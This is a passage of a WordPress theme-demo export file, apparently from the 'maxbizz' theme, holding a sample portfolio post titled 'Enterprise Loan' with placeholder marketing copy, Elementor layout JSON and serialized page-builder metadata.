		<wp:meta_value><![CDATA[a:9:{s:11:"text-editor";a:3:{s:5:"count";i:8;s:15:"control_percent";i:1;s:8:"controls";a:2:{s:7:"content";a:1:{s:14:"section_editor";a:2:{s:6:"editor";i:8;s:8:"drop_cap";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:3:{s:15:"_padding_mobile";i:3;s:15:"_padding_tablet";i:1;s:8:"_padding";i:5;}}}}s:6:"column";a:3:{s:5:"count";i:12;s:15:"control_percent";i:0;s:8:"controls";a:1:{s:6:"layout";a:1:{s:6:"layout";a:3:{s:12:"_inline_size";i:12;s:19:"_inline_size_tablet";i:8;s:19:"_inline_size_mobile";i:6;}}}}s:7:"heading";a:3:{s:5:"count";i:7;s:15:"control_percent";i:1;s:8:"controls";a:3:{s:7:"content";a:1:{s:13:"section_title";a:2:{s:5:"title";i:7;s:11:"header_size";i:7;}}s:5:"style";a:1:{s:19:"section_title_style";a:5:{s:11:"title_color";i:4;s:21:"typography_typography";i:4;s:22:"typography_font_family";i:4;s:20:"typography_font_size";i:4;s:22:"typography_font_weight";i:4;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:7;}}}}s:7:"section";a:3:{s:5:"count";i:6;s:15:"control_percent";i:0;s:8:"controls";a:3:{s:6:"layout";a:2:{s:14:"section_layout";a:3:{s:3:"gap";i:4;s:16:"content_position";i:1;s:6:"layout";i:2;}s:17:"section_structure";a:1:{s:9:"structure";i:4;}}s:5:"style";a:2:{s:18:"section_background";a:2:{s:21:"background_background";i:1;s:16:"background_color";i:1;}s:14:"section_border";a:1:{s:13:"border_radius";i:1;}}s:8:"advanced";a:2:{s:16:"section_advanced";a:2:{s:7:"padding";i:4;s:14:"padding_mobile";i:1;}s:19:"_section_responsive";a:2:{s:20:"reverse_order_tablet";i:1;s:20:"reverse_order_mobile";i:1;}}}}s:5:"image";a:3:{s:5:"count";i:2;s:15:"control_percent";i:2;s:8:"controls";a:3:{s:7:"content";a:1:{s:13:"section_image";a:2:{s:5:"image";i:2;s:10:"image_size";i:2;}}s:5:"style";a:1:{s:19:"section_style_image";a:1:{s:19:"image_border_radius";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:3:{s:7:"_margin";i:1;s:14:"_margin_mobile";i:1;s:15:"_padding_tablet";i:1;}}}}s:9:"icon-list";a:3:{s:5:"count";i:1;s:15:"control_percent";i:3;s:8:"controls";a:3:{s:7:"content";a:1:{s:12:"section_icon";a:1:{s:9:"icon_list";i:1;}}s:5:"style";a:3:{s:17:"section_icon_list";a:1:{s:13:"space_between";i:1;}s:18:"section_icon_style";a:2:{s:10:"icon_color";i:1;s:9:"icon_size";i:1;}s:18:"section_text_style";a:1:{s:11:"text_indent";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:1;}}}}s:7:"divider";a:3:{s:5:"count";i:2;s:15:"control_percent";i:1;s:8:"controls";a:1:{s:5:"style";a:1:{s:21:"section_divider_style";a:3:{s:5:"color";i:2;s:3:"gap";i:2;s:10:"gap_mobile";i:1;}}}}s:9:"iprogress";a:3:{s:5:"count";i:4;s:15:"control_percent";i:1;s:8:"controls";a:2:{s:7:"content";a:1:{s:15:"content_section";a:3:{s:9:"bar_style";i:4;s:5:"title";i:4;s:7:"percent";i:4;}}s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:15:"_padding_tablet";i:2;s:15:"_padding_mobile";i:1;}}}}s:12:"social-icons";a:3:{s:5:"count";i:1;s:15:"control_percent";i:6;s:8:"controls";a:3:{s:7:"content";a:1:{s:19:"section_social_icon";a:3:{s:16:"social_icon_list";i:1;s:7:"columns";i:1;s:5:"align";i:1;}}s:5:"style";a:2:{s:20:"section_social_style";a:9:{s:10:"icon_color";i:1;s:18:"icon_primary_color";i:1;s:20:"icon_secondary_color";i:1;s:9:"icon_size";i:1;s:12:"icon_spacing";i:1;s:19:"image_border_border";i:1;s:18:"image_border_width";i:1;s:18:"image_border_color";i:1;s:13:"border_radius";i:1;}s:20:"section_social_hover";a:1:{s:18:"hover_border_color";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:1;}}}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Enterprise Loan</title>
		<link>http://wpdemo.archiwp.com/maxbizz/portfolio/enterprise-loan/</link>
		<pubDate>Fri, 11 Sep 2020 07:12:33 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz/?post_type=ot_portfolio&#038;p=830</guid>
		<description></description>
		<content:encoded><![CDATA[<p>Not so long ago, marketing consumer products felt like a genteel game of lawn tennis: Established competitors invested in creative with long lead times, using proven models of TV and big-box retail, alongside trusted agency partners. Today, it’s more like a sprawling contest of mixed martial arts, with new competitors playing by different rules; an unprecedented complexity of channels, content and partners; and a step change in speed and ways of working that has punches flying at incumbent consumer products companies. Within the span of most executives’ careers, advances in technology have reshaped how consumers engage with brands.</p>		
			<h6>Client:</h6>		
		<p>OceanThemes</p>		
			<h6>Website:</h6>		
		<p>oceanthemes.net</p>		
			<h6>Date:</h6>		
		<p>January 12, 2018</p>		
			<h6>Category:</h6>		
		<p>Marketing/Finance</p>		
										<img width="1174" height="620" src="https://maxbizz.s3.amazonaws.com/images/project-details.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/project-details.jpg 1174w, https://maxbizz.s3.amazonaws.com/images/project-details-300x158.jpg 300w, https://maxbizz.s3.amazonaws.com/images/project-details-1024x541.jpg 1024w, https://maxbizz.s3.amazonaws.com/images/project-details-768x406.jpg 768w" sizes="(max-width: 1174px) 100vw, 1174px" />											
			<h5>01. Сhallenge</h5>		
		<p>Fueling the blur of combat is a radical shift in brand growth models. Within the span of most executives’ careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. The same technology advances have dramatically altered the competitive landscape.</p>		
					<ul>
							<li>
							<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve">
<g>
	<g id="c147_full_moon">
		<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
	</g>
	<g id="Capa_1_14_">
	</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
</svg>						
										the organization is just beginning to operate in the market, implementing some projects. Our team of global experts help you achieve sustainable, organic growth by focusing on three critical building blocks.
									</li>
								<li>
							<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve">
<g>
	<g id="c147_full_moon">
		<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
	</g>
	<g id="Capa_1_14_">
	</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
</svg>						
										there are projects that require temporary expansion of the marketing department. Customer-focused businesses build a virtuous cycle we call the "customer wheel." We help you at every stage of growth, developing custom solutions and collaborating with all levels of your organization.
									</li>
						</ul>
			<h5>02. Solutions</h5>		
		<p>What’s the right path forward? Reinventing the brand growth model requires more than a reallocation of marketing budget to digital. CMOs need a reassessment of growth platforms and future brand portfolios, a new understanding of the consumer journey, a supporting strategy on data and technology. Fueling the blur of combat is a radical shift in brand growth models. Within the span of most executives’ careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. The same technology advances have dramatically altered the competitive landscape.</p>		
					75				
			<h6>marketing analysis</h6>		
					65				
			<h6>business innovation</h6>		
					90				
			<h6>finance strategy</h6>		
					45				
			<h6>corporate management</h6>		
			<h5>03. Results</h5>		
		<p>A utility company was steadily losing customers as consumers gained the right to select their energy supplier. To boost loyalty, we helped the company transform its culture to be intensely customer-focused.</p><p>We helped a global technology company that specializes in software to reduce the complexity and mystery around their pricing strategy. The work helped generate millions more in income each year. We helped a multibillion dollar global technology giant simplify structures, save millions in costs, and create better-prepared sellers with more time for customers. We helped a multibillion dollar global technology giant simplify organizational structures, save millions in costs.</p>		
										<img width="606" height="342" src="https://maxbizz.s3.amazonaws.com/images/chart-project.png" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/chart-project.png 606w, https://maxbizz.s3.amazonaws.com/images/chart-project-300x169.png 300w" sizes="(max-width: 606px) 100vw, 606px" />											
					<a target="_blank" rel="noopener noreferrer">
						Twitter
											</a>
					<a target="_blank" rel="noopener noreferrer">
						Facebook-f
											</a>
					<a target="_blank" rel="noopener noreferrer">
						Google-plus-g
											</a>
					<a target="_blank" rel="noopener noreferrer">
						Pinterest-p
											</a>]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>830</wp:post_id>
		<wp:post_date><![CDATA[2020-09-11 07:12:33]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-11 07:12:33]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[enterprise-loan]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[ot_portfolio]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
										<category domain="portfolio_cat" nicename="business"><![CDATA[business]]></category>
		<category domain="portfolio_cat" nicename="marketing"><![CDATA[marketing]]></category>
						<wp:postmeta>
		<wp:meta_key><![CDATA[_edit_last]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_thumbnail_id]]></wp:meta_key>
		<wp:meta_value><![CDATA[831]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_page_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[slide_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[rs_page_bg_color]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_switch]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_bg_image]]></wp:meta_key>
		<wp:meta_value><![CDATA[774]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[slide_img]]></wp:meta_key>
		<wp:meta_value><![CDATA[832]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_edit_mode]]></wp:meta_key>
		<wp:meta_value><![CDATA[builder]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_template_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[wp-post]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_version]]></wp:meta_key>
		<wp:meta_value><![CDATA[3.0.10]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_data]]></wp:meta_key>
		<wp:meta_value><![CDATA[[{"id":"7adbf0ca","elType":"section","settings":{"gap":"extended","content_position":"bottom","structure":"20","padding":{"unit":"px","top":"80","right":"0","bottom":"50","left":"0","isLinked":false}},"elements":[{"id":"14f0c251","elType":"column","settings":{"_column_size":50,"_inline_size":65,"_inline_size_tablet":100},"elements":[{"id":"431e8d5","elType":"widget","settings":{"editor":"<p>Not so long ago, marketing consumer products felt like a genteel game of lawn tennis: Established competitors invested in creative with long lead times, using proven models of TV and big-box retail, alongside trusted agency partners. Today, it\u2019s more like a sprawling contest of mixed martial arts, with new competitors playing by different rules; an unprecedented complexity of channels, content and partners; and a step change in speed and ways of working that has punches flying at incumbent consumer products companies. Within the span of most executives\u2019 careers, advances in technology have reshaped how consumers engage with brands.<\/p>","drop_cap":"yes","_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"}],"isInner":false},{"id":"61d4ce9c","elType":"column","settings":{"_column_size":50,"_inline_size":35,"_inline_size_tablet":100},"elements":[{"id":"24904d7d","elType":"section","settings":{"gap":"extended","structure":"20","background_background":"classic","background_color":"#F5F5F5","border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true},"padding":{"unit":"px","top":"35","right":"20","bottom":"35","left":"20","isLinked":false},"padding_mobile":{"unit":"px","top":"15","right":"15","bottom":"15","left":"15","isLinked":true}},"elements":[{"id":"771bc1d8","elType":"column","settings":{"_column_size":50,"_inline_size":47.8130000000000023874235921539366245269775390625,"_inline_size_mobile":100},"elements":[{"id":"21ed026b","elType":"widget","settings":{"title":"Client:","header_size":"h6","title_color":"#1B1D21","typography_typography":"custom","typography_font_family":"Inter","typography_font_size":{"unit":"px","size":16,"sizes":[]},"typography_font_weight":"bold","_padding":{"unit":"px","top":"0","right":"0","bottom":"3","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"ca6bc03","elType":"widget","settings":{"editor":"<p>OceanThemes<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"28","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"49ed3d5a","elType":"widget","settings":{"title":"Website:","header_size":"h6","title_color":"#1B1D21","typography_typography":"custom","typography_font_family":"Inter","typography_font_size":{"unit":"px","size":16,"sizes":[]},"typography_font_weight":"bold","_padding":{"unit":"px","top":"0","right":"0","bottom":"3","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"3fabd3ac","elType":"widget","settings":{"editor":"<p>oceanthemes.net<\/p>","_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"}],"isInner":true},{"id":"17e6f8b0","elType":"column","settings":{"_column_size":50,"_inline_size":52.1820000000000021600499167107045650482177734375,"_inline_size_mobile":100},"elements":[{"id":"b60571d","elType":"widget","settings":{"title":"Date:","header_size":"h6","title_color":"#1B1D21","typography_typography":"custom","typography_font_family":"Inter","typography_font_size":{"unit":"px","size":16,"sizes":[]},"typography_font_weight":"bold","_padding":{"unit":"px","top":"0","right":"0","bottom":"3","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"68f7ccb0","elType":"widget","settings":{"editor":"<p>January 12, 2018<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"28","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"2502bf2","elType":"widget","settings":{"title":"Category:","header_size":"h6","title_color":"#1B1D21","typography_typography":"custom","typography_font_family":"Inter","typography_font_size":{"unit":"px","size":16,"sizes":[]},"typography_font_weight":"bold","_padding":{"unit":"px","top":"0","right":"0","bottom":"3","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"36dfc991","elType":"widget","settings":{"editor":"<p>Marketing\/Finance<\/p>"},"elements":[],"widgetType":"text-editor"}],"isInner":true}],"isInner":true}],"isInner":false}],"isInner":false},{"id":"25e1e05c","elType":"section","settings":{"padding":{"unit":"px","top":"0","right":"0","bottom":"45","left":"0","isLinked":false}},"elements":[{"id":"5d14aed4","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"6e1392f9","elType":"widget","settings":{"image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/project-details.jpg","id":780},"image_size":"full","image_border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true}},"elements":[],"widgetType":"image"}],"isInner":false}],"isInner":false},{"id":"4baafc7e","elType":"section","settings":[],"elements":[{"id":"d37e57f","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"689eca1d","elType":"widget","settings":{"title":"<span style=\"color:#ff8523\">01.<\/span> \u0421hallenge","header_size":"h5","_padding":{"unit":"px","top":"0","right":"0","bottom":"25","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"16134fbd","elType":"widget","settings":{"editor":"<p>Fueling the blur of combat is a radical shift in brand growth models. Within the span of most executives\u2019 careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. <span style=\"color: #1b1d21; font-weight: 600;\">The same technology advances have dramatically <\/span>altered the competitive landscape.<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"24","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"71fb547e","elType":"widget","settings":{"icon_list":[{"text":"<span style=\"color:#262832; font-weight:600;\">the organization is just beginning to operate<\/span> in the market, implementing some projects. Our team of global experts help you achieve sustainable, organic growth by focusing on three critical building blocks.","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"b098382"},{"text":"<span style=\"color:#262832; font-weight:600;\">there are projects that require temporary expansion<\/span> of the marketing department. Customer-focused businesses build a virtuous cycle we call the \"customer wheel.\" We help you at every stage of growth, developing custom solutions and collaborating with all levels of your organization.","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"7ebdebe"}],"space_between":{"unit":"px","size":17,"sizes":[]},"icon_color":"#FF8523","icon_size":{"unit":"px","size":6,"sizes":[]},"text_indent":{"unit":"px","size":14,"sizes":[]},"_padding":{"unit":"px","top":"0","right":"0","bottom":"0","left":"19","isLinked":false}},"elements":[],"widgetType":"icon-list"},{"id":"629613d6","elType":"widget","settings":{"text":"Divider","color":"#0000001A","gap":{"unit":"px","size":45,"sizes":[]},"gap_mobile":{"unit":"px","size":30,"sizes":[]}},"elements":[],"widgetType":"divider"},{"id":"2c8f645d","elType":"widget","settings":{"title":"<span style=\"color:#ff8523\">02.<\/span> Solutions","header_size":"h5","_padding":{"unit":"px","top":"0","right":"0","bottom":"25","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"b5e814c","elType":"widget","settings":{"editor":"<p>What\u2019s the right path forward? Reinventing the brand growth model requires more than a reallocation of marketing budget to digital. CMOs need a reassessment of growth platforms and future brand portfolios, a new understanding of the consumer journey, a supporting strategy on data and technology. Fueling the blur of combat is a radical shift in brand growth models. Within the span of most executives\u2019 careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. <span style=\"color: #1b1d21; font-weight: 600;\">The same technology advances have dramatically <\/span>altered the competitive landscape.<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"24","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"778641be","elType":"section","settings":{"layout":"full_width","gap":"extended","structure":"40"},"elements":[{"id":"26dc818a","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_mobile":100,"_inline_size_tablet":50},"elements":[{"id":"64874fb1","elType":"widget","settings":{"bar_style":"circle","title":"marketing analysis","percent":{"unit":"%","size":75,"sizes":[]},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"iprogress"}],"isInner":true},{"id":"7b30c963","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_mobile":100,"_inline_size_tablet":50},"elements":[{"id":"67d378d0","elType":"widget","settings":{"bar_style":"circle","title":"business innovation","percent":{"unit":"%","size":65,"sizes":[]},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"iprogress"}],"isInner":true},{"id":"7c53f1eb","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_mobile":100,"_inline_size_tablet":50},"elements":[{"id":"5b9830ef","elType":"widget","settings":{"bar_style":"circle","title":"finance strategy","percent":{"unit":"%","size":90,"sizes":[]},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"iprogress"}],"isInner":true},{"id":"2883c113","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_mobile":100,"_inline_size_tablet":50},"elements":[{"id":"28cbe1dd","elType":"widget","settings":{"bar_style":"circle","title":"corporate management","percent":{"unit":"%","size":45,"sizes":[]}},"elements":[],"widgetType":"iprogress"}],"isInner":true}],"isInner":true},{"id":"1f125b56","elType":"widget","settings":{"text":"Divider","color":"#0000001A","gap":{"unit":"px","size":35,"sizes":[]}},"elements":[],"widgetType":"divider"},{"id":"35f563f0","elType":"widget","settings":{"title":"<span style=\"color:#ff8523\">03.<\/span> Results","header_size":"h5","_padding":{"unit":"px","top":"0","right":"0","bottom":"25","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"58ba4a37","elType":"section","settings":{"gap":"no","structure":"20","padding":{"unit":"px","top":"0","right":"0","bottom":"60","left":"0","isLinked":false},"layout":"full_width","reverse_order_tablet":"reverse-tablet","reverse_order_mobile":"reverse-mobile"},"elements":[{"id":"76d6a232","elType":"column","settings":{"_column_size":50,"_inline_size":null,"_inline_size_tablet":100},"elements":[{"id":"cb7464f","elType":"widget","settings":{"editor":"<p>A utility company was steadily losing customers as consumers gained the right to select their energy supplier. To boost loyalty, we helped the company transform its culture to be intensely customer-focused.<\/p><p>We helped a global technology company that specializes in software to reduce the complexity and mystery <span style=\"color: #ff8523;\">around their pricing strategy.<\/span> The work helped generate millions more in income each year. We helped a multibillion dollar global technology giant simplify structures, save millions in costs, and create better-prepared sellers with more time for customers. We helped a multibillion dollar global technology giant simplify organizational structures, save millions in costs.<\/p>","_padding":{"unit":"px","top":"0","right":"42","bottom":"0","left":"0","isLinked":false},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"}],"isInner":true},{"id":"73647df6","elType":"column","settings":{"_column_size":50,"_inline_size":null,"_inline_size_tablet":100},"elements":[{"id":"39d23e2f","elType":"widget","settings":{"image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/chart-project.png","id":784},"image_size":"full","_margin":{"unit":"px","top":"0","right":"0","bottom":"0","left":"-15","isLinked":false},"_margin_mobile":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":false},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false}},"elements":[],"widgetType":"image"}],"isInner":true}],"isInner":true},{"id":"6d4cf1fa","elType":"widget","settings":{"social_icon_list":[{"social_icon":{"value":"fab fa-twitter","library":"fa-brands"},"_id":"049712d","item_icon_color":"custom","item_icon_primary_color":"#51AFF7","item_icon_secondary_color":"#FFFFFF"},{"social_icon":{"value":"fab fa-facebook-f","library":"fa-brands"},"_id":"030f11b","item_icon_color":"custom","item_icon_primary_color":"#284BAF","item_icon_secondary_color":"#FFFFFF"},{"social_icon":{"value":"fab fa-google-plus-g","library":"fa-brands"},"_id":"9c6b4b3","item_icon_color":"custom","item_icon_primary_color":"#E03609","item_icon_secondary_color":"#FFFFFF"},{"social_icon":{"value":"fab fa-pinterest-p","library":"fa-brands"},"_id":"b977f7f","item_icon_color":"custom","item_icon_primary_color":"#E40000","item_icon_secondary_color":"#FFFFFF"}],"icon_color":"custom","icon_primary_color":"rgba(26, 26, 26, 0)","icon_secondary_color":"#1A1A1A","icon_size":{"unit":"px","size":14,"sizes":[]},"icon_spacing":{"unit":"px","size":15,"sizes":[]},"image_border_border":"solid","image_border_width":{"unit":"px","top":"1","right":"1","bottom":"1","left":"1","isLinked":true},"image_border_color":"rgba(255, 255, 255, 0)","border_radius":{"unit":"px","top":"50","right":"50","bottom":"50","left":"50","isLinked":true},"hover_border_color":"rgba(255, 255, 255, 0)","columns":"4","align":"right","_padding":{"unit":"px","top":"0","right":"0","bottom":"50","left":"0","isLinked":false}},"elements":[],"widgetType":"social-icons"}],"isInner":false}],"isInner":false}]]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_controls_usage]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:9:{s:11:"text-editor";a:3:{s:5:"count";i:8;s:15:"control_percent";i:1;s:8:"controls";a:2:{s:7:"content";a:1:{s:14:"section_editor";a:2:{s:6:"editor";i:8;s:8:"drop_cap";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:3:{s:15:"_padding_mobile";i:3;s:15:"_padding_tablet";i:1;s:8:"_padding";i:5;}}}}s:6:"column";a:3:{s:5:"count";i:12;s:15:"control_percent";i:0;s:8:"controls";a:1:{s:6:"layout";a:1:{s:6:"layout";a:3:{s:12:"_inline_size";i:12;s:19:"_inline_size_tablet";i:8;s:19:"_inline_size_mobile";i:6;}}}}s:7:"heading";a:3:{s:5:"count";i:7;s:15:"control_percent";i:1;s:8:"controls";a:3:{s:7:"content";a:1:{s:13:"section_title";a:2:{s:5:"title";i:7;s:11:"header_size";i:7;}}s:5:"style";a:1:{s:19:"section_title_style";a:5:{s:11:"title_color";i:4;s:21:"typography_typography";i:4;s:22:"typography_font_family";i:4;s:20:"typography_font_size";i:4;s:22:"typography_font_weight";i:4;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:7;}}}}s:7:"section";a:3:{s:5:"count";i:6;s:15:"control_percent";i:0;s:8:"controls";a:3:{s:6:"layout";a:2:{s:14:"section_layout";a:3:{s:3:"gap";i:4;s:16:"content_position";i:1;s:6:"layout";i:2;}s:17:"section_structure";a:1:{s:9:"structure";i:4;}}s:5:"style";a:2:{s:18:"section_background";a:2:{s:21:"background_background";i:1;s:16:"background_color";i:1;}s:14:"section_border";a:1:{s:13:"border_radius";i:1;}}s:8:"advanced";a:2:{s:16:"section_advanced";a:2:{s:7:"padding";i:4;s:14:"padding_mobile";i:1;}s:19:"_section_responsive";a:2:{s:20:"reverse_order_tablet";i:1;s:20:"reverse_order_mobile";i:1;}}}}s:5:"image";a:3:{s:5:"count";i:2;s:15:"control_percent";i:2;s:8:"controls";a:3:{s:7:"content";a:1:{s:13:"section_image";a:2:{s:5:"image";i:2;s:10:"image_size";i:2;}}s:5:"style";a:1:{s:19:"section_style_image";a:1:{s:19:"image_border_radius";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:3:{s:7:"_margin";i:1;s:14:"_margin_mobile";i:1;s:15:"_padding_tablet";i:1;}}}}s:9:"icon-list";a:3:{s:5:"count";i:1;s:15:"control_percent";i:3;s:8:"controls";a:3:{s:7:"content";a:1:{s:12:"section_icon";a:1:{s:9:"icon_list";i:1;}}s:5:"style";a:3:{s:17:"section_icon_list";a:1:{s:13:"space_between";i:1;}s:18:"section_icon_style";a:2:{s:10:"icon_color";i:1;s:9:"icon_size";i:1;}s:18:"section_text_style";a:1:{s:11:"text_indent";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:1;}}}}s:7:"divider";a:3:{s:5:"count";i:2;s:15:"control_percent";i:1;s:8:"controls";a:1:{s:5:"style";a:1:{s:21:"section_divider_style";a:3:{s:5:"color";i:2;s:3:"gap";i:2;s:10:"gap_mobile";i:1;}}}}s:9:"iprogress";a:3:{s:5:"count";i:4;s:15:"control_percent";i:1;s:8:"controls";a:2:{s:7:"content";a:1:{s:15:"content_section";a:3:{s:9:"bar_style";i:4;s:5:"title";i:4;s:7:"percent";i:4;}}s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:15:"_padding_tablet";i:2;s:15:"_padding_mobile";i:1;}}}}s:12:"social-icons";a:3:{s:5:"count";i:1;s:15:"control_percent";i:6;s:8:"controls";a:3:{s:7:"content";a:1:{s:19:"section_social_icon";a:3:{s:16:"social_icon_list";i:1;s:7:"columns";i:1;s:5:"align";i:1;}}s:5:"style";a:2:{s:20:"section_social_style";a:9:{s:10:"icon_color";i:1;s:18:"icon_primary_color";i:1;s:20:"icon_secondary_color";i:1;s:9:"icon_size";i:1;s:12:"icon_spacing";i:1;s:19:"image_border_border";i:1;s:18:"image_border_width";i:1;s:18:"image_border_color";i:1;s:13:"border_radius";i:1;}s:20:"section_social_hover";a:1:{s:18:"hover_border_color";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:1;}}}}}]]></wp:meta_value>
		</wp:postmeta>
